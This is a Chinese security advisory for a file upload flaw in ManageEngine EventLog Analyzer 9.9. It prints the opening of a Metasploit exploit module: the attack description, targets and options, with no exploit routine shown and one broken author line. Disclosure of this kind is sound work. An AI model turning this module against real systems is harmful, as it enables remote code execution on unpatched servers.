发布日期:2014-08-31
更新日期:2014-09-03
受影响系统:
ManageEngine EventLog Analyzer 9.9 Build 9002
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 69482
ManageEngine EventLog Analyzer是IT合规性、事件日志管理软件。
EventLog Analyzer 9.9 Build 9002及其他管理在实现上存在任意文件上传漏洞和未授权访问漏洞,攻击者可利用这些漏洞执行任意代码并未授权访问应用。
<*来源:h0ng10
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Eventlog Analyzer Arbitrary File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer.
The vulnerability exists in the agentUpload servlet which accepts unauthenticated
file uploads and handles zip file contents in a insecure way. By combining both
weaknesses a remote attacker can achieve remote code execution. This module has been
tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions
between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server,
while versions 8.1+ are only exploitable via a JSP upload.
},
'Author' =>
[
'h0ng10' <
'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/86' ]
],
'DefaultOptions' => { 'WfsDelay' => 5 },
'Privileged' => false, # Privileged on Windows but not on Linux targets
'Platform' => %w{ java linux win },
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Eventlog Analyzer v7.0 - v8.0 / Java universal',
{
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'WfsDelay' => 30
}
],
[ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Windows',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Linux',
{
'Platform' => 'linux',
'Arch' => ARCH_X86
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 31 2014'))
register_options(
[
Opt::RPORT(8400),
OptInt.new('SLEEP',
[true, 'Seconds to sleep while we wait for EAR deployment (Java target only)', 15]),
], self.class)
end